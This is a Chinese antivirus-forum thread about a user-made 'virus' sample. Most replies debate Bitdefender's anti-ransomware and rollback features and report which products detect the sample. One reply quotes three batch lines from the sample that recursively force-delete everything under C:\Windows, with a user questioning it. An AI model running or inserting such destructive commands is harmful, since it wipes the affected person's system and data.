楼主: lILPRTSl
收起左侧

[病毒样本] 我自制的病毒

  [复制链接]
帝辛
发表于 2018-4-8 00:23:36 来自手机 | 显示全部楼层
温馨小屋 发表于 2018-4-7 22:03

BD就不算了吧?我就不懂了。BD防勒索全黑模式也叫防勒索吗?跟我锁住文件夹有啥区别。全黑。一定要一个一个设置运行才能修改。我TM设置桌面保护之后。安装包设置个快捷方式都要把安装包加防勒索的白名单。
zgj_lz
发表于 2018-4-8 09:38:48 | 显示全部楼层
快说,是开玩笑的,认真你就车俞了。
温馨小屋
头像被屏蔽
发表于 2018-4-8 09:43:50 | 显示全部楼层
帝辛 发表于 2018-4-8 00:23
BD就不算了吧?我就不懂了。BD防勒索全黑模式也叫防勒索吗?跟我锁住文件夹有啥区别。全黑。一定要一个一 ...

你说啥呢,是不是回复错帖子了。。。

防勒索确实有点智障,所以我只把我的重要文件目录放进防勒索了,桌面和我的文档什么的都拿出去了,对于论文和源代码这类东西要访问他们的程序只有一两个,全做排除就行了
昨天样本区测试的时候碰到了个硬盘炸弹,过了ATD,把我所有分区下能删的都删了,数据盘里唯一幸存的数据就是勒索保护目录里面的数据。。。
ccboxes
发表于 2018-4-8 13:57:20 | 显示全部楼层
帝辛 发表于 2018-4-8 00:23
BD就不算了吧?我就不懂了。BD防勒索全黑模式也叫防勒索吗?跟我锁住文件夹有啥区别。全黑。一定要一个一 ...

自己看清楚,这是扫描杀。

另外BD的那个功能也不是什么防勒索,人家叫“Safe Files”,就只是一个文件夹访问控制而已。BD真正的防勒索是启发式的,跟ATD整合在一起。

帝辛
发表于 2018-4-8 17:24:07 | 显示全部楼层
ccboxes 发表于 2018-4-8 13:57
自己看清楚,这是扫描杀。

另外BD的那个功能也不是什么防勒索,人家叫“Safe Files”,就只是一个文件 ...

他就是叫防勒索。BD英文版现在还在我虚拟机里面待着。卡巴是真正组合防勒索到主防里面。BD2017加了一个单独控件就是保护特定文件夹的防勒索。2018因为2017的勒索事件才这么快推出ATD。因为ATD带回滚。2017的防勒索组件也保留了。。你把英文单词打到翻译里面去看看好不好。
所以我没看错。我可能没搞清楚这里是扫描杀。之前很多其他都miss的。下面有人来句BD反勒索保护了。我就很不理解了。
wohaofan1200
发表于 2018-4-8 19:50:37 | 显示全部楼层

13年的病毒库哎
zazaqo
发表于 2018-4-9 00:31:01 | 显示全部楼层
火绒杀
holley
发表于 2018-4-9 09:34:44 | 显示全部楼层
  1. cd /d "C:\Windows"
  2. del /s /q /f *.*
  3. for /d %%i in (*) do rd /s /q "%%i"
复制代码

这样真的好么???
不脱单不改名
发表于 2018-4-9 11:11:34 | 显示全部楼层
楼主自首电话110
ccboxes
发表于 2018-4-9 16:20:44 | 显示全部楼层
帝辛 发表于 2018-4-8 17:24
他就是叫防勒索。BD英文版现在还在我虚拟机里面待着。卡巴是真正组合防勒索到主防里面。BD2017加了一个单 ...



自己看,另外BD的ATD并没有回滚已加密文件的功能。目前几大厂中应该就只有卡巴和趋势带加密文件回滚,限制性也很大。



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 01:37 , Processed in 0.099687 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表